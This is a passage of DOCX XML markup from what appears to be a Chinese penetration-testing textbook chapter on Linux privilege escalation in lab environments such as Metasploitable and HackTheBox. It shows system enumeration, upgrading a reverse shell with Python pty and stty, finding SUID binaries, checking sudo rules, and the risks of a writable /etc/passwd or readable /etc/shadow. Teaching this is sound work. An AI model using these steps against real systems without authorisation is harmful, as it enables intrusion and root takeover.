        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等关键系统文件的权限。如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可写，攻击者可以直接添加一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uid 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的新用户；如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可读，攻击者可以提取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哈希进行离线破解（详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">当前环境变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">printenv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PATH、LD_PRELOAD、PYTHONPATH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等变量是否包含用户可写目录。某些程序在运行时会从这些路径加载库或可执行文件，存在劫持可能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">运行中的进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行的进程，注意那些暴露在用户可访问路径下的配置文件或执行文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内核版本与发行版信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/os-release</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，用于判断是否存在已知的本地权限提升漏洞（详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">概念）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">已安装的编程语言和工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">which python python3 perl ruby gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，有些提权利用需要借助特定语言的解释器环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：本节实操回指第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章中通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或手动利用漏洞获取的低权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell。典型场景为一个运行着过时或配置不当服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2/3、HackTheBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Easy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">难度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②），我们已获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或普通</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤一：升级为非交互式半功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是一个脆弱的基础</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Netcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反弹的、webshell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的），首先需要升级以获得更稳定、完整的工作环境。常用命令序列</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">③：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 若 python3 可用</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TERM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">xterm</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 按 Ctrl+Z 回到本地终端，然后执行：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># stty raw -echo; fg</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 按 Enter 两次</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（注：此步骤具体命令因靶机环境内可用的解释器版本而异</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②，若没有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能需尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Python2、script、或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">socat。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤二：SUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">枚举</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-perm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-4000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象：输出若干绝对路径（环境值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/chsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/gpasswd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等常规</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件）。攻击者需关注“反常”的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件——即通常不应具有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的程序。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机中，常见的人为设置包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/vim.basic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python3.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位。发现此类文件后，核对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://gtfobins.github.io/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）中该二进制的利用方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见排错：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无异常发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：说明目标系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置较规范，转而检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo、cron、capabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等维度。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令无输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：可能</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不在当前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PATH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中（尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绝对路径），或者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重定向有问题（尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或去掉重定向查看错误消息）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤三：sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则枚举</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象：若当前用户被配置了某些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限，会列出规则。注意输出中是否包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(root) NOPASSWD:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前缀（表示无需密码即可执行），以及允许的命令是否在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GTFOBins </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权常见列表中（如</w:t>
      </w:r>
      <w:r>
